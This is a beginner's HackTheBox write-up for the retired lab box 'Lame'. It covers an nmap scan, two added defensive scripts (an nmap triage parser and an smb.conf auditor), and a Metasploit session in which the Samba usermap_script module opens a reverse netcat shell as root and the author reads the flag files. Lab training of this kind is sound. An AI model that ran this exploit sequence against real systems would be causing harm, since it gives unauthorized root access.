HackTheBox: Lame walkthrough

No, not “a lame walkthrough” but “the walkthrough of the box called Lame.” That came off wrong. Anyhow ….

Yes, hello.

There are several HTB Lame walkthroughs out there — I am documenting these steps so that I can have a reference for future enumerations. Aight, let’s do this.

Intro

Lame is a super beginner-friendly box; in fact, this is my first walkthrough and the first box I ever rooted on HTB.

Time required: 15 minutes if you know what you’re doing, 1 hour if you are going to fumble your way through all this like I did.
You will also need an HTB VIP subscription, because this is a retired box, and an attack box with nmap and Metasploit installed. I am using Kali myself.

Let’s do this.

Recon

We shall start off with a basic nmap sweep; the output is below.
The flags, broken down:
– -Pn: treat all hosts as online and skip host discovery (recommended by HTB)
– -A: aggressive scan. Currently this enables OS detection (-O), version detection (-sV), script scanning (-sC) and traceroute (--traceroute).

kali@kali:~$ nmap 10.10.10.3 -Pn -A
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-26 22:56 EST
Nmap scan report for 10.10.10.3
Host is up (0.22s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.25
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h39m03s, deviation: 3h32m12s, median: 9m00s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-01-26T23:05:52-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.79 seconds

Fancy, eh?
Two things you need to take away from this output:
– Anonymous FTP login allowed
– The Samba version is Samba smbd 3.0.20-Debian
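To make those takeaways reproducible rather than something you read off the screen, here is a small triage script. It is an added example for this write-up, not part of nmap: it parses the plain-text report, attaches each NSE script line to its port, and flags the same three things a reviewer of this scan would act on (anonymous FTP, the Samba banner, and the SMB signing state). The excerpt it parses is a constructed cut of the scan above, and the WATCHLIST entry and its note are mine. For anything beyond a one-off, use nmap -oX and an XML parser; the text format is for humans and is not stable.

```python
"""Triage an `nmap -A` text report: pull out the findings the walkthrough acts
on so they can be reviewed in bulk. Added example, not nmap's own parser."""
import re

# Constructed sample: an excerpt of the scan output shown above.
NMAP_REPORT = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# "<port>/<proto>  <state>  <service>  <version banner>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Banners this write-up ties to a public exploit module (my own list).
WATCHLIST = {
    "Samba smbd 3.0.20": "usermap_script command execution (see Exploit section)",
}


def parse_report(report):
    """Split the report into port entries (each carrying its NSE script lines)
    and the host-level script lines. Returns (ports, host_scripts)."""
    ports, host_scripts = [], []
    target = None  # list that the next '|' lines belong to
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m:
            entry = {"port": int(m.group(1)), "proto": m.group(2),
                     "state": m.group(3), "service": m.group(4),
                     "version": m.group(5).strip(), "scripts": []}
            ports.append(entry)
            target = entry["scripts"]
        elif line.startswith("Host script results"):
            target = host_scripts
        elif line.startswith("|") and target is not None:
            target.append(line.lstrip("|_ ").rstrip())
        elif not line.strip():
            target = None  # blank line ends the current block
    return ports, host_scripts


def triage(report):
    """Return the findings worth acting on, as plain strings, in report order."""
    ports, host_scripts = parse_report(report)
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        where = f"{p['port']}/{p['proto']}"
        if any("Anonymous FTP login allowed" in s for s in p["scripts"]):
            findings.append(f"{where}: anonymous FTP login allowed")
        for banner, note in WATCHLIST.items():
            if p["version"].startswith(banner):
                findings.append(f"{where}: {p['version']} -> {note}")
    if any("message_signing: disabled" in s for s in host_scripts):
        findings.append("smb: message signing disabled (relay risk)")
    return findings


if __name__ == "__main__":
    for finding in triage(NMAP_REPORT):
        print(finding)
```

Run it as-is and it prints the anonymous FTP line, the Samba 3.0.20 banner with its note, and the signing warning; point it at another scan's text and the WATCHLIST is the only part you need to extend.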

Exploit

A little detour: I ftp’d into the box as the anonymous user and poked around, but I didn’t find anything, so eventually I switched up my strategy. At this point I was getting quite frustrated, so I did some googling and stumbled upon a hint. Fast forward 30 minutes…

I googled “Samba 3.0.20 Debian” and lo and behold, the first hit is our friends over at Rapid7 describing an exploit. Would you look at that. So I fired up Metasploit and searched for “samba”. Well, who would’ve thought, there was the exploit:

msf5 exploit(linux/snmp/awind_snmp_exec) > search samba/usermap_script

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


msf5 exploit(linux/snmp/awind_snmp_exec) > use 0
[*] Using configured payload cmd/unix/reverse_netcat
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.3       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.25      yes       The listen address (an interface may be specified)
   LPORT  4443             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.25:4443 
[*] Command shell session 6 opened (10.10.14.25:4443 -> 10.10.10.3:45786) at 2021-01-27 00:05:46 -0500

Tah-dah! We have a shell. The rest was a walk in the park:

msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.25:4443 
[*] Command shell session 7 opened (10.10.14.25:4443 -> 10.10.10.3:45787) at 2021-01-27 00:06:51 -0500

whoami
root
find / -name user.txt
/home/makis/user.txt
cat /home/makis/user.txt
<the user flag>

find / -name root.txt
/root/root.txt
cat /root/root.txt
<the root flag>

And that’s how you root Lame on HackTheBox.
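The module’s name, Samba "username map script" Command Execution, tells a defender exactly which smb.conf parameter to look for. The audit script below is an added example for this write-up, not part of Samba or Metasploit: it parses a smb.conf, flags a username map script in [global], and flags a server signing setting weaker than mandatory (the message_signing: disabled that nmap reported), with a hardened configuration beside the weak one. Both configuration texts are constructed, and the script path in the weak one is a placeholder. It relies on Samba ignoring case and whitespace in parameter names, which is why the keys are normalised before lookup.

```python
"""Audit a smb.conf for the two settings this box's scan and exploit hinge on.
Added example; the config texts are constructed."""
import re

# Constructed: a [global] section with the parameter the module abuses.
VULNERABLE_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server
   security = user
   ; placeholder path, not a real script on the box
   username map script = /etc/samba/scripts/mapusers.sh

[homes]
   browseable = no
"""

# Constructed: same share layout, parameter removed, signing enforced.
HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server
   security = user
   server signing = mandatory

[homes]
   browseable = no
"""


def parse_smb_conf(text):
    """Return {section: {key: value}}. Keys are lowercased with whitespace
    removed, matching how Samba compares parameter names."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue  # blank or comment line
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections


def audit(text):
    """Return a list of (severity, message) findings for the [global] section."""
    g = parse_smb_conf(text).get("global", {})
    findings = []
    script = g.get("usernamemapscript")
    if script:
        findings.append(("high",
                         f"username map script is set ({script}); Samba runs it "
                         "with the client-supplied username, so remove it unless "
                         "it is required and the Samba build is patched"))
    signing = g.get("serversigning", "").lower()
    if signing != "mandatory":
        findings.append(("medium",
                         f"server signing = {signing or '<default>'}; set "
                         "'server signing = mandatory' so clients cannot be relayed"))
    return findings


if __name__ == "__main__":
    for name, conf in (("vulnerable", VULNERABLE_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {name} ==")
        for severity, message in audit(conf) or [("info", "no findings")]:
            print(f"[{severity}] {message}")
```

Pointed at a real /etc/samba/smb.conf it reports both findings for a configuration like the one this box runs and nothing for the hardened version; include files (the include parameter) are not followed, so check those by hand.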

Bis bald,
Anna
